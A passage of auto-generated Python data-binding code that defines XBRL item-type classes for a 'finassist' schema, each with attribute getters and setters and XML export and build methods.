value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class unsignedLongItemType
class unsignedIntItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if unsignedIntItemType.subclass:
return unsignedIntItemType.subclass(*args_, **kwargs_)
else:
return unsignedIntItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='unsignedIntItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='unsignedIntItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='unsignedIntItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='unsignedIntItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='unsignedIntItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class unsignedIntItemType
class unsignedShortItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if unsignedShortItemType.subclass:
return unsignedShortItemType.subclass(*args_, **kwargs_)
else:
return unsignedShortItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='unsignedShortItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='unsignedShortItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='unsignedShortItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='unsignedShortItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='unsignedShortItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class unsignedShortItemType
class unsignedByteItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if unsignedByteItemType.subclass:
return unsignedByteItemType.subclass(*args_, **kwargs_)
else:
return unsignedByteItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='unsignedByteItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='unsignedByteItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='unsignedByteItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='unsignedByteItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='unsignedByteItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class unsignedByteItemType
class positiveIntegerItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if positiveIntegerItemType.subclass:
return positiveIntegerItemType.subclass(*args_, **kwargs_)
else:
return positiveIntegerItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='positiveIntegerItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='positiveIntegerItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='positiveIntegerItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='positiveIntegerItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='positiveIntegerItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class positiveIntegerItemType
class stringItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if stringItemType.subclass:
return stringItemType.subclass(*args_, **kwargs_)
else:
return stringItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='stringItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='stringItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='stringItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='stringItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='stringItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class stringItemType
class booleanItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if booleanItemType.subclass:
return booleanItemType.subclass(*args_, **kwargs_)
else:
return booleanItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='booleanItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='booleanItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='booleanItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='booleanItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='booleanItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class booleanItemType
class hexBinaryItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if hexBinaryItemType.subclass:
return hexBinaryItemType.subclass(*args_, **kwargs_)
else:
return hexBinaryItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='hexBinaryItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='hexBinaryItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='hexBinaryItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='hexBinaryItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='hexBinaryItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class hexBinaryItemType
class base64BinaryItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if base64BinaryItemType.subclass:
return base64BinaryItemType.subclass(*args_, **kwargs_)
else:
return base64BinaryItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='base64BinaryItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='base64BinaryItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='base64BinaryItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='base64BinaryItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='base64BinaryItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class base64BinaryItemType
class anyURIItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if anyURIItemType.subclass:
return anyURIItemType.subclass(*args_, **kwargs_)
else:
return anyURIItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='anyURIItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='anyURIItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='anyURIItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='anyURIItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='anyURIItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class anyURIItemType
class QNameItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if QNameItemType.subclass:
return QNameItemType.subclass(*args_, **kwargs_)
else:
return QNameItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='QNameItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='QNameItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='QNameItemType', pretty_print=pretty_print)
